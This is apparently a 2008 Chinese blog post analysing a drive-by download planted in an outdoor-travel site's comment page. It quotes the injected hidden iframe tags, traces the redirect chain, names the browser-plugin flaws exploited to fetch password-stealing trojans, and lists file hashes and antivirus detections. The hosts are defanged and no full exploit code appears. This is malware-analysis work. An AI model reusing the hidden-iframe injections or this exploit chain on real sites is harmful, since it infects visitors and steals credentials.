某中国户外资料网驴友评论页面挂马Trojan.PSW.Win32.GameOL.ojr等

某中国户外资料网驴友评论页面挂马Trojan.PSW.Win32.GameOL.ojr等

 

endurer 原创

2008-08-03 第1版

在Google梅里雪山的资料时，打开某中国户外资料网的驴友评论页面hxxp://www.*8***2*6**4.com/comment/15267，瑞星提示：

病毒名称                         处理结果    查杀方式            访问染毒文件的进程                    文件                    
Trojan.DL.Script.JS.Agent.dn    清除成功    文件监控            D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE                    C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/E8I5NP4S/fxx[1].htm         
Trojan.DL.Script.JS.Agent.dn    直接跳过网页中的脚本网页监控    "D:/Program Files/Maxthon/Maxthon.exe"                  C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899088.tmp                     
Trojan.DL.Script.JS.Agent.dn    直接跳过网页中的脚本网页监控    "D:/Program Files/Maxthon/Maxthon.exe"                  C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899088.tmp                     
Trojan.DL.Script.JS.Agent.dn    清除成功    文件监控            D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE                    C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/E8I5NP4S/fxx[2].htm         
Trojan.DL.Script.JS.Agent.dn    直接跳过网页中的脚本网页监控    "D:/Program Files/Maxthon/Maxthon.exe"                  C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899088.tmp                     
Trojan.DL.Script.JS.Agent.dn    直接跳过网页中的脚本网页监控    "D:/Program Files/Maxthon/Maxthon.exe"                  C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899088.tmp                     
Trojan.DL.Script.JS.Agent.dn    清除成功    文件监控            D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE                    C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/E8I5NP4S/fxx[3].htm         
Trojan.DL.Script.JS.Agent.dn    清除成功    文件监控            D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE                    C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/BLN0E2XG/fxx[1].htm         
Trojan.DL.Script.JS.Agent.dn    清除成功    文件监控            D:/PROGRAM FILES/MAXTHON/MAXTHON.EXE                    C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/BLN0E2XG/fxx[2].htm         
Trojan.DL.Script.JS.Agent.dn    直接跳过网页中的脚本网页监控     "D:/Program Files/Maxthon/Maxthon.exe"                  C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/286060899208.tmp

检查网页代码，发现：
#1 hxxp://www.*8***2*6**4.com/comment/15267
/---
＜iframe src=hxxp://www.p**dh**0*01.cn/b3.htm width=50 height=0 border=0＞＜/iframe＞
---/

 

#1.1 hxxp://www.p**dh**0*01.cn/b3.htm 包含代码：
/---
＜Iframe src="hxxp://user1**.j*zm*01**7.cn/a3/fxx.htm" width=100 height=0＞＜/iframe＞
＜Iframe src="hxxp://j*zm*01**5.cn/fx.htm" width=100 height=0＞＜/iframe＞
＜Iframe src="hxxp://j*zm*01**5.cn/ac.htm" width=100 height=0＞＜/iframe＞
---/

#1.1.1 hxxp://user1**.j*zm*01**7.cn/a3/fxx.htm　输出以下页面：

 

#1.1.1.1 hxxp://user1**.j*zm*01**7.cn/a3/ss.html

 

利用 Outlook Express的wab.exe的 MS Office Snapshot Viewer ActiveX （"snpvw.Snapshot Viewer Control.1"）Exploit 漏洞 下载 hxxp://down**.h**s7**yu*e.cn/new/a3.css

 

文件说明符 : E:/test/a3.css
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-3 17:37:28
修改时间 : 2008-8-3 17:37:30
大小 : 24752 字节 24.176 KB
MD5 : 75d4e9b54a5c6f986c55d5a6f9b201b5
SHA1: 7D5DC946A99150FABE527DFB9DDC02E79A015B4D
CRC32: c501efe6

 

卡巴斯基报为：Trojan.Win32.Agent.wnu，瑞星报为：Trojan.PSW.Win32.GameOL.ojr
 
#1.1.1.2 利用 新浪DLoader Class ActiveX控件（clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A，Downloader.DLoader.1）任意文件下载漏洞下载 hxxp://down**.h**s7**yu*e.cn/down/sina.exe

 

文件说明符 : E:/test/sina.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-3 17:38:22
修改时间 : 2008-8-3 17:38:24
大小 : 24755 字节 24.179 KB
MD5 : f77c8813a1f339dc1d33e857698f3bad
SHA1: 250D9DA105EA3236965A1E61EB9665CB5444EAD7
CRC32: 88d6a14d

 

卡巴斯基报为：Trojan.Win32.Agent.wnu，瑞星报为：Trojan.PSW.Win32.GameOL.ojr

#1.1.1.3 hxxp://user1**.j*zm*01**7.cn/a3/ms06014.js

利用 ms06-014漏洞下载 hxxp://down**.h**s7**yu*e.cn/new/a3.css

 

#1.1.1.4

下载利用flash播放器（clsid:d27cdb6e-ae6d-11cf-96b8-444553540000，ShockwaveFlash.ShockwaveFlash.9）漏洞的文件hxxp://j*zm*01**5.cn/i115.swf，hxxp://j*zm*01**5.cn/f115.swf

 

文件说明符 : E:/test/i115.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 17:46:27
修改时间 : 2008-8-3 17:46:28
大小 : 1333 字节 1.309 KB
MD5 : e7a88a4f7675548abf33125340a4e1ef
SHA1: C520DC487D5A94E37D33C2DA495453FB69A6EDED
CRC32: 9c053649

 

卡巴斯基报为：Exploit.SWF.Downloader.eh，瑞星报为：Hack.Exploit.Swf.a

 

文件说明符 : E:/test/f115.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 17:50:24
修改时间 : 2008-8-3 17:50:26
大小 : 1334 字节 1.310 KB
MD5 : 1b32c1a8689773858b3a3fa737ad81fd
SHA1: 20A1A4E9C0A8AED87F36D8989286A8C9E1BA7F29
CRC32: fe71dc31

 

卡巴斯基报为：Exploit.SWF.Downloader.eh，瑞星报为：Hack.Exploit.Swf.a

 

#1.1.1.5

利用uusee（clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B，UUUPGRADE.UUUpgradeCtrl.1）漏洞
从 hxxp://down**.h**s7**yu*e.cn/down/ 下载 恶意程序文件

 

#1.1.1.6 hxxp://user1**.j*zm*01**7.cn/a3/GLWORLD.html （瑞星报为：Hack.Exploit.Script.JS.Bucode.c）

利用联众（clsid:61F5C358-60FB-4A23-A312-D2B556620F20，GLIEDown.IEDown.1）漏洞下载hxxp://down**.h**s7**yu*e.cn/new/a3.css
 
#1.1.1.7 hxxp://user1**.j*zm*01**7.cn/a3/real.js

利用RealPlayer（IERPCtl.IERPCtl.1）漏洞下载 hxxp://down**.h**s7**yu*e.cn/new/a3.css

 

#1.1.1.8 hxxp://user1**.j*zm*01**7.cn/a3/Real.html

利用RealPlayer（clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA）漏洞下载 hxxp://down**.h**s7**yu*e.cn/new/a3.css

#1.1.1.9 利用百度工具条（BaiduBar.Tool）下载 hxxp://down**.h**s7**yu*e.cn/down/Baidu.cab，内含 ko.exe

 

文件说明符 : E:/test/Baidu.cab
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 17:53:8
修改时间 : 2008-8-3 17:53:10
大小 : 21503 字节 20.1023 KB
MD5 : 061d55e5a7c83c3811fe65e4a3b88001
SHA1: 95AF393F6B9541A735028A3A549E400E86A1E6AD
CRC32: f97b906a

 

文件说明符 : E:/test/ko.exe
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-3 17:53:13
修改时间 : 2008-7-24 10:33:58
大小 : 21580 字节 21.76 KB
MD5 : 65447ffa08b8990d6a5887cb66e88a70
SHA1: 085CC23928087892EFB7314E3FDAE8325E0C1AB2
CRC32: ab4079ec

 

卡巴斯基报为：Trojan-Downloader.Win32.Agent.wps，瑞星报为：Trojan.DL.Win32.Game.a

 

#1.1.1.10 hxxp://user1**.j*zm*01**7.cn/a3/Thunder.html

利用迅雷（clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F，DPClient.Vod）漏洞下载 hxxp://down**.h**s7**yu*e.cn/new/a3.css

#1.1.2 hxxp://j*zm*01**5.cn/fx.htm
输出以下页面：

 

#1.1.2.1 hxxp://j*zm*01**5.cn/ilink.html

检测IE浏览器上的flash播放器版本并相应的下载 i115.swf、i64.swf、i47.swf、i45.swf、i28.swf、i16.swf

 

文件说明符 : E:/test/i16.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 18:0:13
修改时间 : 2008-8-3 18:0:14
大小 : 1332 字节 1.308 KB
MD5 : 715ba3cc3518d13f18be330b49686f30
SHA1: 239CBBC9AFC14F424908BEA404323D4A96D70B94
CRC32: 4ef344da

 

卡巴斯基报为：Exploit.SWF.Downloader.eh，瑞星报为：Hack.Exploit.Swf.a

 

文件说明符 : E:/test/i28.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 18:0:13
修改时间 : 2008-8-3 18:0:14
大小 : 1332 字节 1.308 KB
MD5 : c2ec382f6711b90d258131658299e8a3
SHA1: A48172942113B3AA6244668993C3D6C91E72905F
CRC32: 0afad039

 

卡巴斯基报为：Exploit.SWF.Downloader.eh，瑞星报为：Hack.Exploit.Swf.a

文件说明符 : E:/test/i45.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 18:0:13
修改时间 : 2008-8-3 18:0:14
大小 : 1333 字节 1.309 KB
MD5 : 1fdcf9004348fc6da39f2c04faad662d
SHA1: D459EB5540460864AB8E96B3F12FA85AC2B6FA45
CRC32: 1a3da06f

 

卡巴斯基报为：Exploit.SWF.Downloader.eh，瑞星报为：Hack.Exploit.Swf.a

 

i47.swf 同 i45.swf

文件说明符 : E:/test/i64.swf
属性 : A---
数字签名:否
PE文件:否
创建时间 : 2008-8-3 18:0:13
修改时间 : 2008-8-3 18:0:14
大小 : 1333 字节 1.309 KB
MD5 : 248d65b4639237f2cc97db3c910629e0
SHA1: 261278838940FD189BD315CF5C839D22DA17FDE1
CRC32: ab1f0d37

 

卡巴斯基报为：Exploit.SWF.Downloader.eh，瑞星报为：Hack.Exploit.Swf.a

 

#1.1.2.2 hxxp://j*zm*01**5.cn/ilink.html

检测FireFox浏览器上的flash播放器版本并相应的下载 i115.swf、i64.swf、i47.swf、i45.swf、i28.swf、i16.swf

#1.1.3 hxxp://j*zm*01**5.cn/ac.htm

利用 Outlook Express的wab.exe的MS Office Snapshot Viewer ActiveX （"snpvw.Snapshot Viewer Control.1"）Exploit 漏洞 下载 hxxp://down**.h**s7**yu*e.cn/down/ac.css

 

文件说明符 : E:/test/ac.css
属性 : A---
数字签名:否
PE文件:是
获取文件版本信息大小失败!
创建时间 : 2008-8-3 17:57:9
修改时间 : 2008-8-3 17:57:10
大小 : 24757 字节 24.181 KB
MD5 : 96ba09e9d83d39594e4d0b4e6721b982
SHA1: 4C213C156617BC8E9B919AA1904ADE7C7D9CB749
CRC32: f29acf04

 

卡巴斯基报为：Trojan.Win32.Agent.wnu，瑞星报为：Trojan.PSW.Win32.GameOL.ojr